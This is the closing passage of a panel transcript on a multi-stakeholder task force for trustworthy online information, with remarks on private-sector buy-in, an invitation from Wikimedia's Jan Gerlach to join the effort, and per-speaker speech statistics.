Yeah, thanks. I also just wanted to comment on this issue of ceding sovereignty or authority when you work in this multi-stakeholder approach. I do think that is of course a challenge, but I also think this is the only way to build good, reliable regulation that actually gets implemented. If we don't have buy-in from the private sector, for example, it is super hard to make sound regulation that will actually have an impact. That's why it's so important, and something we work for from the Danish side, to try to include more private sector engagement and more civil society engagement, to make sure that when we do make regulation, it's well-informed and we have the buy-in to actually make it work out in the real world. So I do think this is a very good example of why this is difficult and why it takes time, but also why it's the only way we can proceed, because states and governments can only do so much; if we don't have buy-in from the rest of the ecosystem, I think it's going to be really difficult to create more trustworthy information online. The internet is not only regulated by governments; it's so big, and it lives beyond the sovereignty of states. That provides some challenges but also some really great opportunities, and it forces us to go into deeper dialogue with some of our counterparts. I do think that's some of the important work we should continue in this task force.

Moderator:
Yeah, thanks so much. Maybe on to the last question of what’s next for the task force and how people can stay connected?

Jan Gerlach:
Well, first of all, we're excited to officially launch this today, and as a task force we hope to grow and find many more people who want to contribute, so that's one way to stay connected and be part of this hopefully growing momentum. As co-chairs, at Wikimedia we're interested in people following us; there are spaces for discussion, like public policy mailing lists. One way to be part of this is actually to become a Wikipedian, if I can do a shameless plug here, and just understand this better. That's sort of my whole point: we need people around the world to understand what is going on and how these systems work, how the citizen journalism space works, how Wikipedia works, how all these civic spaces actually function, and by joining them, you're making a huge contribution. Obviously, we don't want to make this all about individual responsibility; that's why there are organizations like ours as well. But staying connected through these very communities that we support is one really meaningful way to help, because at the end of the day, we are just here to serve them, and by directly joining them, you're doing very helpful work. So yeah, be part of this and try to stay connected in that way. Thank you.

Moderator:
So with that, I think we are out of time. Thank you so much for everybody’s participation and your inputs. And if you are interested in learning more about the task force or even participating, please do talk to one of us up here. Thank you.

Alisson Peters
Speech speed: 163 words per minute
Speech length: 515 words
Speech time: 189 secs

Audience
Speech speed: 169 words per minute
Speech length: 1091 words
Speech time: 388 secs

Ivan Sigal
Speech speed: 179 words per minute
Speech length: 2083 words
Speech time: 698 secs

Jan Gerlach
Speech speed: 170 words per minute
Speech length: 1645 words
Speech time: 580 secs

Klara Therese Christensen
Speech speed: 180 words per minute
Speech length: 1507 words
Speech time: 502 secs

Moderator
Speech speed: 168 words per minute
Speech length: 1929 words
Speech time: 690 secs